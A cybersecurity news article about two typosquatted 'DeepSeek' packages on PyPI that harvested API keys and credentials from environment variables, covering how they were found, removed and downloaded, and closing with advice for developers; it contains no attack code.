Cyber Security News

Beware of Fake DeepSeek PyPI packages that Delivers Malware

The Positive Technologies Expert Security Center (PT ESC) recently uncovered a malicious campaign targeting the Python Package Index (PyPI) repository.

The campaign involved two packages, named deepseeek and deepseekai, designed to collect sensitive user data and environment variables.

These packages exploited the growing interest in AI and machine learning tools, particularly targeting developers and AI enthusiasts.

The attack, orchestrated by a user under the alias “bvk,” began on January 29, 2025.

The account had been dormant since its creation in June 2023, raising red flags about its origin.

The malicious payload embedded in the packages activates when users execute commands associated with the respective packages.

DeepSeek PyPI packagesDeepSeek PyPI packages
Malicious payload used in the packages

Once triggered, the payload collects sensitive data such as API keys, credentials, and access tokens stored in environment variables.

These variables play a critical role in enabling application functionalities and accessing infrastructure resources.

Both packages utilized Pipedream, a developer integration platform, as their command-and-control (C2) server to transmit stolen data.

Analyzing the script revealed it was partially generated with the assistance of AI, evident from characteristic in-code comments.

The Attack Chain

The deepseek package was first uploaded at 15:52 UTC on January 29, followed shortly by deepseek ai at 16:13 UTC.

Within 30 minutes, PT ESC researchers flagged the packages as malicious and informed PyPI administrators, who swiftly quarantined them.

By 16:41 UTC, the deepseeek package was removed, followed by the deletion of deepseekai shortly after.

Despite the prompt response, the packages were downloaded multiple times before removal.

PyPI’s logs reveal 222 downloads across various countries, including the U.S., China, Russia, and Germany.

The downloads occurred via various methods, including pip, bandersnatch, and manual browser access.

The United States accounted for the majority of downloads, followed by China and Russia.

While the campaign was not particularly sophisticated, it serves as a cautionary tale about how cybercriminals exploit trending technologies to deceive unsuspecting users.

As AI tools like DeepSeek gain popularity, attackers will continue leveraging such opportunities.

Fortunately, PT ESC’s PT PyAnalysis tool, designed to monitor PyPI for suspicious activity in real time, played a pivotal role in uncovering these packages before significant harm could occur.

Developers and security teams are advised to exercise heightened caution when integrating newly released PyPI packages into their workflows.

Verify the credibility of package maintainers and utilize automated tools to flag suspicious activity.

As the cybersecurity landscape continues to evolve, vigilance remains the best defense against supply chain threats.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Aman Mishra

Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Recent Posts

LockBit Ransomware Group Breached: Internal Chats and Data Leaked Online

The notorious LockBit ransomware group, once considered one of the world’s most prolific cyber extortion…

1 hour ago

Cisco IOS XE Wireless Controllers Vulnerability Lets Attackers Seize Full Control

A critical security flaw has been discovered in Cisco IOS XE Wireless LAN Controllers (WLCs),…

2 hours ago

Top Ransomware Groups Target Financial Sector, 406 Incidents Revealed

Flashpoint analysts have reported that between April 2024 and April 2025, the financial sector emerged…

16 hours ago

Agenda Ransomware Group Enhances Tactics with SmokeLoader and NETXLOADER

The Agenda ransomware group, also known as Qilin, has been reported to intensify its attacks…

16 hours ago

SpyCloud Analysis Reveals 94% of Fortune 50 Companies Have Employee Data Exposed in Phishing Attacks

SpyCloud, the leading identity threat protection company, today released an analysis of nearly 6 million…

17 hours ago

PoC Tool Released to Detect Servers Affected by Critical Apache Parquet Vulnerability

F5 Labs has released a new proof-of-concept (PoC) tool designed to help organizations detect servers…

19 hours ago